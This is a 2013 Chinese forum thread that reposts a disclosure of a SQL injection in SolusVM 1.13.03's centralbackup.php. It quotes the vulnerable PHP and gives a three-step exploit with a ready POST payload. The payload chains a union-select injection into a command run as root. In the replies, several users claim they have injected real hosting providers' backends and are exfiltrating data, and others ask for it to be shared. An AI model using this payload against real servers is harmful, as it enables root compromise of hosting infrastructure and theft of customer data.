找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
查看: 98|回复: 10

【干货】美国VPS管理系统SolusVM 1.13.03 SQL注入漏洞(含exp)

[复制链接]

413

主题

6667

回帖

1万

积分

论坛元老

积分
14613
发表于 2013-6-21 10:55:41 | 显示全部楼层 |阅读模式
相信这几天用SolusVM的同学都提心吊胆了好多天吧……

做好数据备份的同学淡定地用吧……

============以上是废话============

披露漏洞的博主地址:http://localhost.re/p/solusvm-11303-vulnerabilities
本文转载自:http://www.freebuf.com/vuls/10611.html

SolusVM 1.13.03 Vulnerabilities
2013/06/16

/centralbackup.php:[ol]
  • query('SELECT * FROM centralbackup WHERE id = \'' . $_POST['deleteid'] . '\'', true);
  •     #[...]
  •     if ($xc[status] == 'failed') {
  •            exec('php /usr/local/solusvm/system/bus.php -- --comm=deletebackup --serverid=' . $xc['bserver'] . ' --nodeid=' . $vdata['nodeid'] . ' --vserverid=' . $vdata['vserverid'] . ' --filename=' . $xc['filename']);
  •     #[...]
  •     }
  • }
  • ?>[/ol]复制代码到了这里我们该怎么做的?SQL注入?exec()?setuid为0?都正确! 让我们来看看exp是怎样的?非常简单的三步[ol]
  • 1.在激活的VM中拥有一个账户
  • 2.登陆,在VM中点击,拷贝GET _v值
  • 3.POST 至/centralbackup.php?_v=[value][/ol]复制代码[ol]
  • delete=1&deleteid=-1' union select 0,0,0,0,0,'failed',';/usr/local/solusvm/core/solusvmc-node --ebtables ";command to run as root";',0#[/ol]复制代码或者使用以下Html表单[ol]
  •      
  •      
  •      
  •      CMD:
  •      
  •      
  • [/ol]复制代码
  • 回复

    使用道具 举报

    868

    主题

    6094

    回帖

    1万

    积分

    论坛元老

    积分
    14830
    发表于 2013-6-21 10:57:06 | 显示全部楼层
    zmban
    回复

    使用道具 举报

    397

    主题

    2697

    回帖

    6631

    积分

    论坛元老

    积分
    6631
    发表于 2013-6-21 10:59:00 | 显示全部楼层
    耶,成功注入饭桶家后台,打包数据中,,,,
    回复

    使用道具 举报

    156

    主题

    2152

    回帖

    4814

    积分

    论坛元老

    积分
    4814
    发表于 2013-6-21 10:57:38 | 显示全部楼层

    誓誓 发表于 2013-6-21 10:57



    耶,成功注入饭桶家后台,打包数据中,,,,

    求分享
    回复

    使用道具 举报

    151

    主题

    1084

    回帖

    2631

    积分

    金牌会员

    积分
    2631
    发表于 2013-6-21 11:03:22 | 显示全部楼层
    还是 看不懂.....
    回复

    使用道具 举报

    143

    主题

    3035

    回帖

    6527

    积分

    论坛元老

    积分
    6527
    发表于 2013-6-21 10:57:00 | 显示全部楼层
    有的已经补了,还是WHMCS的库好。
    回复

    使用道具 举报

    9

    主题

    2326

    回帖

    4687

    积分

    论坛元老

    积分
    4687
    发表于 2013-6-21 11:05:56 | 显示全部楼层
    耶,成功注入单手MJJ家的
    回复

    使用道具 举报

    691

    主题

    2961

    回帖

    8001

    积分

    论坛元老

    积分
    8001
    发表于 2013-6-21 11:13:14 | 显示全部楼层
    不明觉厉
    回复

    使用道具 举报

    186

    主题

    4643

    回帖

    9856

    积分

    论坛元老

    积分
    9856
    发表于 2013-6-21 11:43:28 | 显示全部楼层


    禁止跨域提交这个不是好多天了吗。。。?
    回复

    使用道具 举报

    0

    主题

    1

    回帖

    4

    积分

    新手上路

    积分
    4
    发表于 2013-6-21 19:38:32 | 显示全部楼层
    真心不太懂
    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    Archiver|手机版|小黑屋|Discuz! X

    GMT+8, 2025-1-20 16:25 , Processed in 0.017997 second(s), 3 queries , Gzip On, Redis On.

    Powered by Discuz! X3.5

    © 2001-2024 Discuz! Team.

    快速回复 返回顶部 返回列表